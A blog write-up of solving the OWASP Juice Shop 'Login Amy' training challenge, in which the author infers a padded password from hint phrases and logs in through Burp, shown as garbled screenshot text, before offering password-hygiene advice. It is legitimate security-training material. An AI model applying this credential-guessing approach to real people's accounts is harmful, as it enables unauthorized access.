Pwning OWASP’s Juice Shop Pt. 25: Login Amy

Challenge: 

Name: Login Amy

Description: Log in with Amy’s original user credentials. (This could take 93.83 billion trillion trillion centuries to brute force, but luckily she did not read the “One Important Final Note”)

Difficulty: 3 star

Category: Sensitive Data Exposure

Expanded Description: https://pwning.owasp-juice.shop/part2/sensitive-data-exposure.html

Tools used:

Burp, FoxyProxy

Resources used:

None.

Methodology: 

As usual, my first stop is the expanded description. In that description, a bullet point states that “The challenge description, in addition to an image of Amy and Kif, contains a few sentences which give away some information how Amy decided to strengthen her password.”. Only two phrases in the challenge description stood out as unique: “93.83 billion trillion trillion centuries”, and “one important final note”. So I started by googling what I assumed would be the less common of the two.

93.83 billion trillion trillion centuries 
Q All Images @ News @ Videos 
About 1,400 results (0.39 seconds) 
www.grc.com haystack • 
Shopping 
i More 
x 
Settings 
Q 
Tools 
GRC's I Password Haystacks: How Well Hidden is Your Needle? 
(Assuming one hundred trillion guesses per second), — And no password cracker would wait 
17.33 centuries before checking to see whether A homebrew password cracking system - that 
cracks at 33.1 billion passwords per second!

That top link looks curiously relevant to this challenge, so I opened it up and scrolled through until I came across the second unique phrase:

<img src="https://curiositykillscolby.files.wordpress.com/2020/11/image-78.jpeg?w=805&quot; alt="The example with One Important Final Note should not be taken literally because it everyone began padding their passwords with simple dots. attackers would soon start adding dots to their guesses to bypass the need for full searching through unknown padding. Instead, YOU should invent your own personal padding_pgucy. You could put some padding in front, andlor interspersed through the phrase, and/or add some more to the end. You could put some characters at the beginning. padding in the middle, and more characters at the end. And also mix-up the padding characters by using simple memorable character pictures like "

Since the expanded description also stated that “Amy – being a little dimwitted – did not put nearly enough effort and creativity into the password selection process”, I knew she had used the same number of periods after her password. Then, based on the image in the expanded description, I worked out that Kif must have been the name she used for her password (with numbers instead of vowels thanks to MS SafeSearch).

Dashboard 
Request 
rv•78 
Target 
Intruder 
Repeater 
Sequencer 
Decoder 
Comparer 
Extender 
Project options 
User options 
"SON web Tokens 
"SON web Tokens 
An 
Actions 
Logger++ 
Target: http:mocaIhost:3000 
Raw Params 
Headers 
Response 
Headers 
Render 
Pretty 
Raw 
200 0K 
ons 
Pretty 
Raw 
POST /rest/user/login HTTP/I.I 
Host: local host 3000 
User-Agent: MoziIIa/S.O (X 
11; Linux x86 64; 
application/ j son, text/ plain, I/ * 
Accept 
Accept -Language: en-US, en; q=O.S 
Accept -Encoding: gzip, deflate 
Content -Type: application/ j son 
Content -Length: 65 
Origin: http• 
// I Ocal host 3000 
Connection: close 
Referer: http• 
// I Ocal host 3000/ 
o) 
Gecko,'20100101 
Firefox/78 
10 
Cookle: language=en; 
wel comebanner 
email 
amy@juice-sh.op , 
password 
status=dismiss, 
cookieconsent 
status=dismiss, 
con 
Access-Cont rol -Allow-Origin: 1 
X-Content -Type-options: nosniff 
SAMEORIGIN 
Feature-policy: payment 
self' 
Content -Type: application/ j son; charset=utf- 
Content -Length: 825 
a-rag: 
Vary: Accept -Encoding 
Date: Mon, 02 Nov 2020 21 : 35:09 GMT 
Connection: close 
authentication" 
"token 
'bid" : 4, 
'umail 
" eyJoeXAioiJKVIQiLCJhbGcioiJsuz11NiJ9. eyJzdGFodXMioiJzdh'Nj ZXNz1iwiZGF0 
amy@j uice-sh op'
You successfully solved a challenge: Login Amy (Log in with Amy's original user credentials. (This could take 
93.83 billion trillion trillion centuries to brute force, but luckily she did not read the "0ne Important Final Note")) 
x

Prevention and Mitigation Strategies:

Take password security seriously. If you absolutely must share your passwords with someone else (spouse, shifty stranger, etc), then do not send it SMS, Email, or any other electronic medium without first encrypting the file. Generating and using an RSA key pair is a pain (not to mention getting the other person to do it), but it beats having your identity stolen.

Use unique passwords for every account you have. When I took my first security course a year ago I was one of those people who reused a few passwords over and over. Today I carry a cipher with me everywhere I go (qwertycards.com has credit card-sized unique ciphers for $5), and to keep myself from forgetting any of the dozen different password character restrictions I’ve encountered, I store all of my passwords in a password manager.

Password managers aren’t 100% secure (nothing is), either. But someone has to seriously want your passwords to use tools like KeeFarce, for KeePass2.x, successfully.

Lessons Learned and Things Worth Mentioning: 

Google is a fantastic resource when it comes to OSINT data collection and research. Learning how to craft more effective queries is tremendously helpful for separating noise from signal, sometimes regular old queries work.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s